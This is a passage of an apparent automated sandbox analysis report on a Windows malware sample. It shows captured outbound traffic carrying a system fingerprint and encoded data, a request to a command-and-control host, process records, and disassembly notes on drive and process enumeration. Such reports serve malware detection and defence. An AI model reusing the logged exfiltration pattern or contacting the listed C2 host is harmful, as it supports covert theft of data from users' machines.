                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710181", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                    Dec 20, 2024 16:56:27.381330967 CET2472OUTData Raw: 33 46 70 76 2b 31 34 66 73 36 5c 2f 70 6a 56 4b 63 61 74 50 77 66 6a 4f 6e 4a 58 55 6f 2b 49 66 68 58 4a 50 37 75 4f 4c 70 72 5a 70 70 4f 4c 75 6d 6b 30 66 6b 50 52 58 37 4d 32 33 5c 2f 42 4a 51 58 48 5c 2f 4e 77 4f 7a 5c 2f 41 4c 70 54 75 5c 2f
                                                    Data Ascii: 3Fpv+14fs6\/pjVKcatPwfjOnJXUo+IfhXJP7uOLprZppOLumk0fkPRX7M23\/BJQXH\/NwOz\/ALpTu\/8Aekr\/AJx61+UXxI8IH4e\/EPx74BbUBqx8D+NPFPhA6qLU2I1M+GtcvtFOoCyNxdmzF6bL7SLU3d19n8zyvtE2zzG\/aPBX6V3gD9IjMs6yfwd49\/1wzHh3A4fM84w3+q\/GnD\/1PA4rEPC0K\/teKOHckoYj
                                                    Dec 20, 2024 16:56:27.381381989 CET4944OUTData Raw: 72 39 50 78 5c 2f 6f 61 5a 73 62 30 5c 2f 6c 5c 2f 6a 57 52 71 51 79 64 76 78 5c 2f 70 55 44 39 50 78 5c 2f 6f 61 74 31 47 7a 64 68 2b 4a 5c 2f 77 41 4b 31 68 74 38 5c 2f 77 42 45 64 6c 50 72 38 76 31 4b 64 52 79 64 76 78 5c 2f 70 55 37 39 66 77
                                                    Data Ascii: r9Px\/oaZsb0\/l\/jWRqQydvx\/pUD9Px\/oat1Gzdh+J\/wAK1ht8\/wBEdlPr8v1KdRydvx\/pU79fw\/qaZVmhXqOQfff8R\/8AXqzJ9xvpUVB0Feq8n+wm7H+e9XJO34\/0qt91u+P6H\/P6UHVS6f4f8hnTZ\/H0\/r\/n8e\/djfdf6j+S1Nu+\/wDwf5\/z16dT0plBsUz\/AMs\/w\/pUD9Px\/oau7G9P5f41DIrn
                                                    Dec 20, 2024 16:56:27.381508112 CET2472OUTData Raw: 70 58 77 50 5c 2f 61 45 76 66 6a 48 2b 77 72 38 59 66 68 6e 34 44 76 76 45 66 37 51 50 67 76 78 4c 71 58 77 4d 2b 4e 6c 78 34 44 38 50 61 70 38 52 76 68 66 38 54 66 43 5c 2f 68 75 35 31 68 34 4c 48 78 6b 2b 6c 76 34 70 30 5c 2f 77 41 4d 33 65 6c
                                                    Data Ascii: pXwP\/aEvfjH+wr8Yfhn4DvvEf7QPgvxLqXwM+Nlx4D8Pap8Rvhf8TfC\/hu51h4LHxk+lv4p0\/wAM3el6GuvGwttZt9MS98PX2kGykj8c6tKP8iPpyeIvGtfxN\/4hnHPI0+EMFguHuIcBlDy3K2oZ9Wy\/MsN9blmLwLzSTq0cdiKCoTxssHH2sZ\/V1OEakf7y+iLQzDKsVQzrhLM6HD3GHEVLNuFoZtiaNPHUMXh62KwOO
                                                    Dec 20, 2024 16:56:27.381535053 CET2472OUTData Raw: 43 63 5c 2f 68 44 39 6e 4c 53 50 47 6d 74 5c 2f 45 76 78 64 38 51 39 54 68 2b 4a 58 68 7a 77 33 70 79 65 4b 5c 2f 44 5c 2f 41 4d 4d 4c 4d 61 58 62 36 76 70 66 69 4c 55 72 36 34 73 4c 5c 2f 77 41 49 65 41 66 44 47 73 52 54 53 74 6f 56 76 62 79 57
                                                    Data Ascii: Cc\/hD9nLSPGmt\/Evxd8Q9Th+JXhzw3pyeK\/D\/AMMLMaXb6vpfiLUr64sL\/wAIeAfDGsRTStoVvbyW7ai+nzQyytPZSzx2s1v\/ADe1++37Vnxu139oj\/gkF+zd8XPFEpuPE\/iX4h+EtL8S3zRpC2q+IvBVr8WvA2uay8UYWGJ9a1Xwxd6tJHAkduj3hW3iihCRr+Bvl+\/6f\/Xr+0PocZTjuH+AON+Hsya+vcP+K\/E
                                                    Dec 20, 2024 16:56:27.381557941 CET2472OUTData Raw: 35 66 37 75 5a 50 33 69 4a 50 46 2b 37 78 2b 58 5c 2f 36 5c 2f 5c 2f 77 42 64 54 62 66 4d 55 76 73 33 77 79 66 36 72 30 5c 2f 38 42 50 66 70 36 2b 6c 56 64 79 62 66 34 4e 6b 66 37 33 79 5c 2f 38 5c 2f 38 41 31 76 70 36 38 76 73 5c 2f 50 38 50 2b
                                                    Data Ascii: 5f7uZP3iJPF+7x+X\/6\/\/wBdTbfMUvs3wyf6r0\/8BPfp6+lVdybf4Nkf73y\/8\/8A1vp68vs\/P8P+CdArybZJkf5H8oeb5n+f\/wBfH0qGPetvsf8A5Zm483g5+vf\/AD+VXN2VdP8AU\/8ALX93n\/8AV\/nj0qnJ+7kdHFxA\/wDpEUvl8+n\/ANatDSn1+X6h5btI\/wAu\/wAvMufX9cVW+eT926eW\/wDyy8v+X6d
                                                    Dec 20, 2024 16:56:27.381720066 CET4944OUTData Raw: 5a 38 54 66 69 4e 34 4c 2b 4d 51 38 53 36 52 70 47 6e 5c 2f 44 72 51 62 31 4c 48 34 63 66 32 4e 6f 75 6b 65 48 37 50 54 42 4d 6d 71 33 75 72 2b 48 59 72 48 53 4c 47 7a 67 75 47 73 62 57 34 30 57 37 75 5a 32 47 59 4c 6d 2b 64 56 61 56 4c 68 56 74
                                                    Data Ascii: Z8TfiN4L+MQ8S6RpGn\/DrQb1LH4cf2NoukeH7PTBMmq3ur+HYrHSLGzguGsbW40W7uZ2GYLm+dVaVLhVt9qv0x8S6PpSeG9bji0+0t1ayvZT9mgjtiZZEZpJCYFjLPIxLOzZLsSWyTX5+T6CmC1vOUxk7Zhlf+\/igFQPdGOOp9f5Oz3xOyDivO8ZmlDJ1wvQxM6fs8vpP6zhqPJQo0ZTeIpQhKdbETpyxOKqyw1GM69apUavK
                                                    Dec 20, 2024 16:56:27.381761074 CET4944OUTData Raw: 56 32 58 62 6a 76 6d 6d 31 59 71 4a 2b 76 34 66 31 4e 42 71 4d 71 43 53 50 35 65 75 66 77 5c 2f 77 41 39 65 6c 54 30 55 48 51 55 70 49 5c 2f 6c 34 34 2b 76 66 5c 2f 50 54 36 66 71 79 70 6e 2b 36 66 77 5c 2f 6d 4b 68 6f 4f 67 68 35 59 5c 2f 77 43
                                                    Data Ascii: V2Xbjvmm1YqJ+v4f1NBqMqCSP5eufw\/wA9elT0UHQUpI\/l44+vf\/PT6fqypn+6fw\/mKhoOgh5Y\/wCeKZ\/Gn1NSydvx\/pUdB2U+vyIfmb1P8v8ADNRtGnuE6f5z\/npVqo5O34\/0oHDb5\/oinJF\/cHr2\/oP8fXmq0iujH+P9f8n0PX1q\/J\/ufz\/\/AF+voBTP4fuR\/wCefp+GM+3eg39p5fj\/AMAofP8A8tO
                                                    Dec 20, 2024 16:56:27.501090050 CET4944OUTData Raw: 73 70 6c 56 68 6d 50 48 57 52 34 53 70 68 36 32 66 55 4d 52 54 71 31 71 6e 74 63 50 57 34 59 71 59 61 6e 6e 31 50 45 55 6f 30 70 56 4b 45 73 74 6c 6a 63 48 4b 74 37 57 4d 46 4b 6c 69 38 4e 57 6f 75 70 52 72 30 71 6b 5c 2f 77 42 6e 79 6a 36 50 66
                                                    Data Ascii: splVhmPHWR4Sph62fUMRTq1qntcPW4YqYann1PEUo0pVKEstljcHKt7WMFKli8NWoupRr0qk\/wBnyj6PfjXn0qayjw24nxyrYTLMfRlRwlLkr4LOMDjcyy\/FUKk68KdejXwWXZhWlOlKaoPBYqlifY1qFSnH6j\/Zl\/a9+Iv7Nuqi20938UfD6+uPO1vwJqN5JDaGRz8+paBeGO5bQtX4\/ezRW89lfp8mo2NzJHaXFp8jwr
                                                    Dec 20, 2024 16:56:27.501261950 CET2472OUTData Raw: 6c 57 48 69 6a 77 33 72 55 42 6c 38 4d 79 36 4c 72 47 69 61 33 5a 61 6a 6f 65 73 61 6c 47 74 32 74 72 2b 71 65 47 6e 45 50 67 44 77 62 68 38 48 77 68 34 62 35 37 6b 32 44 6f 63 53 34 2b 4f 63 59 50 4c 38 50 6d 6d 64 5a 71 73 66 6a 73 78 79 76 4a
                                                    Data Ascii: lWHijw3rUBl8My6LrGia3ZajoesalGt2tr+qeGnEPgDwbh8Hwh4b57k2DocS4+OcYPL8PmmdZqsfjsxyvJnTxCxua18fKi8Vls8l9jRniqNKbr4dUqX1jESVT8a8V+FvpM8f4jH8d+KnDmfZhiOEsseRY\/M8Tk+QZNLLstyzM87qVMNLL8mw2WrELB5gs9q4jEU8FiK1OlQxVSvW+p4RSpV\/7\/1\/qaZUq9W+v9TTWXHI6fy
                                                    Dec 20, 2024 16:56:27.501292944 CET2472OUTData Raw: 76 74 48 2b 66 54 74 36 65 39 48 64 7a 35 6d 37 5c 2f 41 4b 61 66 35 48 2b 4f 50 30 71 61 54 65 73 66 7a 70 76 5c 2f 41 4f 65 55 66 75 4d 39 76 38 5c 2f 57 6d 66 50 35 63 32 79 54 35 4d 32 5c 2f 5c 2f 58 65 48 74 2b 48 39 61 44 51 68 6b 6a 52 74
                                                    Data Ascii: vtH+fTt6e9Hdz5m7\/AKaf5H+OP0qaTesfzpv\/AOeUfuM9v8\/WmfP5c2yT5M2\/\/XeHt+H9aDQhkjRtjuPKTyvK6fv4rj\/n76\/4e5qHzDHGj7OPK\/1f5n8\/89OKtNH9z540\/deV39f+Pr\/r99c+nFJJs8ze3yJ\/zzj\/AM\/p9aDop1N9P67r+u2pT\/5aIivI\/b\/ph\/PjFDR\/fQJ\/0y\/dy\/uKm8v5pn8k


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.1049709185.121.15.192803784C:\Users\user\Desktop\WP6s7cCLzr.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 20, 2024 16:56:28.980463982 CET87OUTGET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                    Host: home.fivetk5ht.top
                                                    Accept: */*
                                                    Dec 20, 2024 16:56:30.278642893 CET212INHTTP/1.0 503 Service Unavailable
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.104970434.226.108.1554433784C:\Users\user\Desktop\WP6s7cCLzr.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-20 15:56:22 UTC52OUTGET /ip HTTP/1.1
                                                    Host: httpbin.org
                                                    Accept: */*
                                                    2024-12-20 15:56:22 UTC224INHTTP/1.1 200 OK
                                                    Date: Fri, 20 Dec 2024 15:56:22 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Connection: close
                                                    Server: gunicorn/19.9.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Credentials: true
                                                    2024-12-20 15:56:22 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                    Data Ascii: { "origin": "8.46.123.189"}


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:10:56:16
                                                    Start date:20/12/2024
                                                    Path:C:\Users\user\Desktop\WP6s7cCLzr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\WP6s7cCLzr.exe"
                                                    Imagebase:0xa00000
                                                    File size:4'423'680 bytes
                                                    MD5 hash:DD8DF388D297C668E3CCCBD9132EE6C1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:10:56:29
                                                    Start date:20/12/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 1140
                                                    Imagebase:0xc60000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:0.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:37
                                                      Total number of Limit Nodes:3
                                                      execution_graph 8955 77d00fd 8956 77d0114 Process32FirstW 8955->8956 8958 77d03ad 8956->8958 8877 77d0072 8878 77d007c 8877->8878 8881 77d00ce 8878->8881 8880 77d00bd 8882 77d00e1 Process32FirstW 8881->8882 8884 77d03ad 8882->8884 8884->8880 8975 77d00d4 8976 77d009c 8975->8976 8977 77d00db 8975->8977 8978 77d00ce Process32FirstW 8976->8978 8977->8976 8980 77d00de Process32FirstW 8977->8980 8979 77d00bd 8978->8979 8982 77d03ad 8980->8982 8913 77d003e 8914 77d0042 8913->8914 8919 77d0058 8914->8919 8920 77d007e 8919->8920 8921 77d00ce Process32FirstW 8920->8921 8922 77d00bd 8921->8922 8857 77809a6 8858 77809b8 GetLogicalDrives 8857->8858 8860 7780dc0 8858->8860 9003 77d008f 9004 77d0097 9003->9004 9007 77d00f1 Process32FirstW 9003->9007 9005 77d00ce Process32FirstW 9004->9005 9006 77d00bd 9005->9006 9009 77d03ad 9007->9009 8949 77d0000 8950 77d0034 8949->8950 8951 77d0058 Process32FirstW 8950->8951 8952 77d0049 8951->8952 8953 77d00ce Process32FirstW 8952->8953 8954 77d00bd 8953->8954

                                                      Executed Functions

                                                      Function 077D01C1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 187COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: lI2;
                                                      • API String ID: 2623510744-1938070717
                                                      • Opcode ID: ee739a1dc04b0ab44ff98ca8d6c387e918a66870d8e4b83fe23c963419f5358c
                                                      • Instruction ID: e36958e3f3741ef7c6ff3373cd868922cee94150b0afc7b1b6d43846c12fbd38
                                                      • Opcode Fuzzy Hash: ee739a1dc04b0ab44ff98ca8d6c387e918a66870d8e4b83fe23c963419f5358c
                                                      • Instruction Fuzzy Hash: B84128EB16C112BE620285451B18EFA2A3EE5D77F0F30A42AF407D7642F3D58E4AC071
                                                      Function 07770CDA Relevance: .2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d322218ccdd0f70e5348c882fa64dcc588313ccef651229c9912b73d169c241a
                                                      • Instruction ID: 86be38d6b41b0dbbfe209c7c8e7f6a76db5bc238c602127b5fe79fa5b50587c3
                                                      • Opcode Fuzzy Hash: d322218ccdd0f70e5348c882fa64dcc588313ccef651229c9912b73d169c241a
                                                      • Instruction Fuzzy Hash: 9421C4FB25C2157C7901C1823F64EFB576ED1C6770B31C82BF806D0006E2959E5E9136
                                                      Function 077809E0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 437COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\
                                                      • API String ID: 0-1047444362
                                                      • Opcode ID: a9063d28787a33366c203fc49ac105d01f10f5c49f5e1b92ab0b827775d8e46b
                                                      • Instruction ID: dae6ec075fd841a6d9175d410bc9c4a4ef2f8778fb292303955373b3c89133d1
                                                      • Opcode Fuzzy Hash: a9063d28787a33366c203fc49ac105d01f10f5c49f5e1b92ab0b827775d8e46b
                                                      • Instruction Fuzzy Hash: 4A81D2EB1EC125BD71C2B455EF54AFB6A6EE2C77B0B308427F807D6602E2D54A4D9031
                                                      Function 077809AD Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 432COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 81 77809ad-7780a22 87 7780a2d-7780a2f 81->87 88 7780a2a 87->88 89 7780a31-7780a32 87->89 88->87 90 7780a1d-7780a22 89->90 91 7780a33-7780d91 89->91 90->87 130 7780d98-7780dbb GetLogicalDrives call 7780dd3 91->130 133 7780dc0-7780ff1 call 7780e09 130->133
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 22fe5f030b3d5903a28768feb28d920f04bf8ee5e7b2f435f06dfd0f512fe503
                                                      • Instruction ID: 7d0d2a064986e612c9678c7c8ccaa799dc7ddd6c3b65f57a3dad42367d5e9ef4
                                                      • Opcode Fuzzy Hash: 22fe5f030b3d5903a28768feb28d920f04bf8ee5e7b2f435f06dfd0f512fe503
                                                      • Instruction Fuzzy Hash: 1281D1EB1EC125BD71C2B455AF54AFB6A2EE2C77B0B308427F807D6602E2D44E4D9031
                                                      Function 077809A6 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 428COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 160 77809a6-7780a22 166 7780a2d-7780a2f 160->166 167 7780a2a 166->167 168 7780a31-7780a32 166->168 167->166 169 7780a1d-7780a22 168->169 170 7780a33-7780d91 168->170 169->166 209 7780d98-7780dbb GetLogicalDrives call 7780dd3 170->209 212 7780dc0-7780ff1 call 7780e09 209->212
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: ee57ff37f8ac7ca6ee49feb9301195e898f3ce69bacb634159da789bf96fc6a9
                                                      • Instruction ID: e79569e6554b78f71d36ea37699ec615fa6fc7d51ceb7add3a8c4f6a0bbb1fa6
                                                      • Opcode Fuzzy Hash: ee57ff37f8ac7ca6ee49feb9301195e898f3ce69bacb634159da789bf96fc6a9
                                                      • Instruction Fuzzy Hash: 3281C2EB1EC125BD71C2B455AF54AFB6A6EE2C77B0B308427F807D6602E2D44E4D9031
                                                      Function 077809CD Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 414COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 239 77809cd-7780a22 244 7780a2d-7780a2f 239->244 245 7780a2a 244->245 246 7780a31-7780a32 244->246 245->244 247 7780a1d-7780a22 246->247 248 7780a33-7780d91 246->248 247->244 287 7780d98-7780dbb GetLogicalDrives call 7780dd3 248->287 290 7780dc0-7780ff1 call 7780e09 287->290
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 1a6f51a295d2a3599af2c6b57994be36380613a547fa553b77c2a39a313aec7c
                                                      • Instruction ID: 192562f5b049d4f1af8a2d506bffaf3d6296e75f65e20a45c72b63d8d63b2fc2
                                                      • Opcode Fuzzy Hash: 1a6f51a295d2a3599af2c6b57994be36380613a547fa553b77c2a39a313aec7c
                                                      • Instruction Fuzzy Hash: 1181D2EB2EC125BD71C2B455EB54AFB6A6EE2C77B0B308427F407D6642E2D44E4D9031
                                                      Function 07780A28 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 403COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 317 7780a28 318 7780a2a 317->318 319 7780a2d-7780a2f 318->319 319->318 320 7780a31-7780a32 319->320 321 7780a1d-7780a22 320->321 322 7780a33-7780d91 320->322 321->319 361 7780d98-7780dbb GetLogicalDrives call 7780dd3 322->361 364 7780dc0-7780ff1 call 7780e09 361->364
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\
                                                      • API String ID: 0-1047444362
                                                      • Opcode ID: 19ee198ada98ad6296e8f0d71cfe462346f596b1886cca77c2146bfda8cb773f
                                                      • Instruction ID: 973078559f91589209a7e42b97c0e70078e8538c0fa4e0864a607056ebc995e4
                                                      • Opcode Fuzzy Hash: 19ee198ada98ad6296e8f0d71cfe462346f596b1886cca77c2146bfda8cb773f
                                                      • Instruction Fuzzy Hash: 5F81E2EB1EC125BD72C2B555EB54AFB6A2EE2C77B0B30842BF407D6602E2D44A4D9031
                                                      Function 077809F8 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 400COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 391 77809f8-7780a22 393 7780a2d-7780a2f 391->393 394 7780a2a 393->394 395 7780a31-7780a32 393->395 394->393 396 7780a1d-7780a22 395->396 397 7780a33-7780d91 395->397 396->393 436 7780d98-7780dbb GetLogicalDrives call 7780dd3 397->436 439 7780dc0-7780ff1 call 7780e09 436->439
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 4469d7802174f11c75b58fb7fbf481eb29cab58eeeb2309962a2e949b6006ca7
                                                      • Instruction ID: 829dc9aecf98e3dbcafebce6a199fd9ecf8234dc1aedf38aa04d817c38be8041
                                                      • Opcode Fuzzy Hash: 4469d7802174f11c75b58fb7fbf481eb29cab58eeeb2309962a2e949b6006ca7
                                                      • Instruction Fuzzy Hash: B981E4EB1EC115BD72C2B555AB54AF76A6EE2C77B0F308427F407D6A02E2D44A4D9031
                                                      Function 07780A14 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 395COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 466 7780a14-7780a22 468 7780a2d-7780a2f 466->468 469 7780a2a 468->469 470 7780a31-7780a32 468->470 469->468 471 7780a1d-7780a22 470->471 472 7780a33-7780d91 470->472 471->468 511 7780d98-7780dbb GetLogicalDrives call 7780dd3 472->511 514 7780dc0-7780ff1 call 7780e09 511->514
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: ca5e4054cd0038a908e68cc0910c73159fe2eaf3a2c760f38e6eb51869866f61
                                                      • Instruction ID: ac2d4862f6315a95012129212036ab968f8cf9fcae8efeb48048e8ff71e3d11e
                                                      • Opcode Fuzzy Hash: ca5e4054cd0038a908e68cc0910c73159fe2eaf3a2c760f38e6eb51869866f61
                                                      • Instruction Fuzzy Hash: 3571C2EB2EC125BD72C2B555EB54AFB6A6EE2C77B0B308427F407D6602E2D44A4D9031
                                                      Function 07780A55 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 386COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 541 7780a55-7780a60 542 7780a62-7780a64 541->542 543 7780a66-7780a6e 541->543 544 7780a6f-7780d91 542->544 543->544 580 7780d98-7780dbb GetLogicalDrives call 7780dd3 544->580 583 7780dc0-7780ff1 call 7780e09 580->583
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\
                                                      • API String ID: 0-1047444362
                                                      • Opcode ID: e1443f0fee0e2345578cd04f3ae077042454726368e6a9ef9aca1c67f157eb51
                                                      • Instruction ID: aff7b4b538c98f6e964b958f596c1f48abb4d0f101a341f9ee5c5ca160e40dbe
                                                      • Opcode Fuzzy Hash: e1443f0fee0e2345578cd04f3ae077042454726368e6a9ef9aca1c67f157eb51
                                                      • Instruction Fuzzy Hash: CE71D4EB1EC115BD72C2B555AF54AFB6A6EE6C77B0B308427F403D6602E2D44B4D9031
                                                      Function 07780A48 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 384COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 610 7780a48-7780d91 649 7780d98-7780dbb GetLogicalDrives call 7780dd3 610->649 652 7780dc0-7780ff1 call 7780e09 649->652
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 42038966f4a86da7ea67264ef265c9b3b4c2170751044927ea451ac103a48cc7
